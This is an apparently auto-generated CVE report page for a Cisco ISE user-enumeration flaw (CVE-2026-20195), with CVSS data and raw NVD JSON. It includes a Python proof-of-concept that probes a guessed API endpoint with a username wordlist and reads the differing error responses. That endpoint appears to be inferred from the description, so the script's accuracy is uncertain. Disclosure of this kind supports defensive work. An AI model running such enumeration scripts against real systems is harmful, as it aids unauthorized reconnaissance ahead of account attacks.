Security Vulnerability Report
CVE-2026-20195 CVSS 5.3 MEDIUM

CVE-2026-20195

Published: 2026-05-06 17:16:22
Last Modified: 2026-05-06 18:59:53

Description

A vulnerability in an identity management API endpoint of Cisco ISE could allow an unauthenticated, remote attacker to enumerate valid user accounts on an affected device. This vulnerability exists because error messages are observed when the affected API endpoint is called. An attacker could exploit this vulnerability by sending a series of crafted requests to the affected endpoint and analyzing the differentiated responses. A successful exploit could allow the attacker to compile a list of valid usernames on an affected system.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Cisco ISE (for the specific affected versions, consult the Cisco Security Advisory cisco-sa-ise-unauth-bypass-uxjRXGpb)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# Target configuration
# Replace with the actual vulnerable endpoint URL
target_url = "https://<ise-ip>/admin/API/mgmt/identity/user"
wordlist = ["admin", "cisco", "guest", "user", "test"]

print("[*] Starting enumeration...")

headers = {
    "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-20195-Scanner)",
    "Accept": "application/json"
}

for username in wordlist:
    # Crafting the request to probe the API endpoint
    # This payload is designed to trigger the error message differentiation
    try:
        response = requests.get(f"{target_url}/{username}", headers=headers, timeout=5, verify=False)

        # Analyzing the response based on the vulnerability description
        # Logic: Different error messages indicate valid vs invalid users
        if "Invalid user" not in response.text and response.status_code != 404:
            print(f"[+] Valid User Found: {username} (Status: {response.status_code})")
        else:
            print(f"[-] Invalid User: {username}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to {target_url}: {e}")
        sys.exit(1)

print("[*] Scan complete.")
```

References

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-bypass-uxjRXGpb (Cisco Security Advisory; weakness classified as CWE-204)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-20195", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:21.630", "lastModified": "2026-05-06T18:59:53.230", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in an identity management API endpoint of Cisco ISE could allow an unauthenticated, remote attacker to enumerate valid user accounts on an affected device.\r\n\r\nThis vulnerability exists because error messages are observed when the affected API endpoint is called. An attacker could exploit this vulnerability by sending a series of crafted requests to the affected endpoint and analyzing the differentiated responses. A successful exploit could allow the attacker to compile a list of valid usernames on an affected system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-bypass-uxjRXGpb", "source": "[email protected]"}]}}
```